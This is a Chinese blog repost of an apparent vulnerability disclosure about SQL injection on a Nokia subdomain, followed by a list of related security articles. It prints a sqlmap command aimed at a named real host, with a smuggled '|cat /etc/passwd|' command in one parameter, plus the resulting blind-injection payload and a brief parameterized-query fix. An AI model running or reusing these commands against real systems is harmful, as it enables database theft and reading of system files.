诺基亚某子站SQL注入涉及1620个表及40万数据网站安全分享!

作者：肖顾问 | 来源：互联网 | 2023-05-17 19:35

搭了个批量漏洞扫描器~~初步扫描还真管用~具体数据没跑，就

搭了个批量%ignore_a_1%扫描器~~初步扫描
还真管用~
具体数据没跑，就是表名。
大战，求高分

注入点：

 python sqlmap.py -u "http://developer.qt.nokia.com/ows-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|" --tables --thread 3

 [15:08:58] [INFO] resuming back-end DBMS &＃39;oracle&＃39; [15:08:58] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Parameter: user_id (GET)     Type: boolean-based blind     Title: AND boolean-based blind - WHERE or HAVING clause     Payload: user_id=1) AND 7908=7908 AND (4640=4640&file=|cat /etc/passwd| --- [15:08:59] [INFO] the back-end DBMS is Oracle back-end DBMS: Oracle

诺基亚某子站SQL注入涉及1620个表及40万数据

还有敏感的数据

诺基亚某子站SQL注入涉及1620个表及40万数据

解决方案：

预编译SQL语句，参数化SQL语句。

访问接口加个参数过滤就更好了。

http://www.dengb.com/wzaq/1101723.htmlwww.dengb.comtruehttp://www.dengb.com/wzaq/1101723.htmlTechArticle诺基亚某子站SQL注入涉及1620个表及40万数据搭了个批量漏洞扫描器~~初步扫描还真管用~ 具体数据没跑，就是表名。大战，求高分注入点…

—-想了解更多的网站安全相关处理怎么解决关注<编程笔记>

推荐阅读

ip
crossorigin注解添加了解决不了跨域问题_CORS与@CrossOrigin详解

1、跨域的基本概念a、跨域的解释要了解跨域，首先需要知晓浏览器的同源策略，简单的说就是两个请求协议、端口、主机都相同，则两个请求具有相同的 ... [详细]

蜡笔小新 2024-09-30 19:24:12
ip
Linux提权之suid篇

Linux提权之suid篇不知攻，焉知防一个在安服路上摸索的大三生，记录平时学习笔记suid前言：1.只有可以执行的二进制程序文件才 ... [详细]

蜡笔小新 2024-09-29 19:32:58
ip
ddos

DDOSDDOS的中文名叫分布式拒绝服务***，俗称洪水***DDoS***概念DoS的***方式有很多种，最基本的DoS***就是利用合理的服务请求来 ... [详细]

蜡笔小新 2024-09-29 14:40:34
get
Visual Studio 2015 开发 ASP.NET 5 有何变化？

Visual Studio 2015 开发 ASP.NET 5 有何变化？ ... [详细]

蜡笔小新 2024-09-24 17:22:51
ip
Webmin远程命令执行漏洞复现及防护方法

本文介绍了Webmin远程命令执行漏洞CVE-2019-15107的漏洞详情和复现方法，同时提供了防护方法。漏洞存在于Webmin的找回密码页面中，攻击者无需权限即可注入命令并执行任意系统命令。文章还提供了相关参考链接和搭建靶场的步骤。此外，还指出了参考链接中的数据包不准确的问题，并解释了漏洞触发的条件。最后，给出了防护方法以避免受到该漏洞的攻击。 ... [详细]

蜡笔小新 2023-12-13 16:14:53
ip
开发笔记：解决播放框架内容安全策略设置不起作用的问题

本文介绍了作者在开发过程中遇到的问题，即播放框架内容安全策略设置不起作用的错误。作者通过使用编译时依赖注入的方式解决了这个问题，并分享了解决方案。文章详细描述了问题的出现情况、错误输出内容以及解决方案的具体步骤。如果你也遇到了类似的问题，本文可能对你有一定的参考价值。 ... [详细]

蜡笔小新 2023-12-13 16:03:19
ip
/etc路径下有些什么？

etc杂七杂八的配置文件etc不是什么缩写，是andsoon(等等)的意思来源于法语的etcetera翻译成中文就是等等的意思.至于为什么在etc下面存放配置文件& ... [详细]

蜡笔小新 2024-09-30 20:08:11
main
ETC 纹理压缩和 Alpha 通道处理

转自：http:malideveloper.arm.comcndevelop-for-malisample-codeetcv1-texture-compression-and-alpha- ... [详细]

蜡笔小新 2024-09-30 20:00:46
ip
E4 - 为什么不需要E5[译]

这是orginally答复Elias的内容:为什么不需要E5风险控制我们一致认为E4和3.x并不是100%兼容的,E4只是提供了一个兼容层用于运行3.x的插件，这其实并不完全符合E4的设计理 ... [详细]

蜡笔小新 2024-09-30 19:11:14
ip
UNP总结 Chapter 12~14 IPv4与IPv6的互操作性、守护进程和inet超级服务器、高级I/O函数

一、IPv4与IPv6的互操作性1.IPv4客户与IPv6服务器拥有双重协议栈的主机的一个基本特性就是：其上运行的IPv6服务器既能应付IPv4客户，又能应付IPv6客户。这是通过使用IPv4映射 ... [详细]

蜡笔小新 2024-09-30 18:55:51
java
编程语言是从哪蹦出来的——大型伦理寻根现场

Hello，我是Alex007，一个热爱计算机编程和硬件设计的小白，为啥是007呢？因为叫Alex的人太多了，再加上每天007的生活，Alex007就诞生了。聊一聊编程到底是啥，怎 ... [详细]

蜡笔小新 2024-09-30 11:12:40
java
软件自动化测试的学习路线

软件自动化测试的学习步骤软件测试交流群关注软件测试技术公众号获取阅读目录软件自动化测试的学习步骤自动化测试的本质自动化测试学习的误区自动化测试的职位自动化测试分类Web自动化 ... [详细]

蜡笔小新 2024-09-30 01:54:19
ip
[软件工具]最新最好最全的软件大全一起打包下载了[永远留种]

软件下载列表：　　安全防毒/QQ病毒专杀工具XPQQKav2006新春版.exe805.14KB　　安全防毒/SymantecAntiVirus10. ... [详细]

蜡笔小新 2024-09-29 15:50:37
main
ajax自动加载列表页,jQuery+ajax实现滚动到页面底部自动加载图文列表效果(类似图片懒加载)...

本文实例讲述了jQueryajax实现滚动到页面底部自动加载图文列表效果。分享给大家供大家参考，具体如下：phttp:www.w3.orgTRxht ... [详细]

蜡笔小新 2024-09-29 14:45:53
python
python高通滤波器设计_Python科学计算——高低通滤波器的设计与使用

总结：先划分窗口，再对每个窗口做高通滤波。不用先滤波再划分。以下转载自http:blog.csdn.netthoughts_stormsarticled ... [详细]

蜡笔小新 2023-10-12 10:03:05

肖顾问

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章